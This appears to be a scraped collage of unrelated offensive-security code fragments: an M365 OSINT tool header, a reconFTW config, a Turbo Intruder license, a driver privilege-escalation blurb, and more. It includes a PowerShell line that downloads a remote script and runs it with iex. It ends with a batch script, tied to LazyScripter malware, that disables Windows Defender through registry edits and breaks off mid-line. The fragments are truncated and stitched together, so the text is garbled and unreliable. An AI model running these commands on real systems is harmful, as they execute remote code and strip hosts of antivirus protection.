```python
#!/usr/bin/env python3
"""
M365 OSINT Reconnaissance Tool
Based on techniques from: https://dstreefkerk.github.io/2025-07-m365-email-osint-after-lockdown/
This script performs modern M365/Azure AD reconnaissance after Microsoft's lockdown of traditional
enumeration methods. It uses multiple validation techniques to discover organizational information
and attempts to infer MOERA domains.
"""
```
```python
import requests
import sys
API_KEY = 'API-KEY-GOES-HERE'
# ANSI color codes
BLUE = '\033[94m'
RED = '\033[91m'
PURPLE = '\033[95m'
GREEN = '\033[92m'
```
```powershell
# To use the function, call it like this:
# iex(new-object net.webclient).downloadstring("https://gist.githubusercontent.com/LuemmelSec/208b8ba52b645ec189031d2b5200f76e/raw/c6c1008da1b5670d3fb549578968c2a2f086a00b/Get-SPVersionInfo.ps1")
# Get-SPVersionInfo -ServerUrl "https://my-sharepointserver"
function Get-SPVersionInfo {
    param (
        [string]$ServerUrl,
        [switch]$SkipCertificateCheck, # Flag to skip certificate checks
        [switch]$SkipHttpErrorCheck # Flag to skip HTTP error handling
    )
```
Mike Alfaro (@_mmpte_software) and Tyler Booth (@tyler_dru1d)
An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges due to an improper DACL being applied to the device the driver creates.
Incorrect Access Control
```bash
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
```
```python
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
from xml.dom import minidom
from pprint import pprint
```
```python
# Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Author: Evan Custodio (@defparam)
#
# MIT License
# Copyright 2021 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
```
```bat
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime
```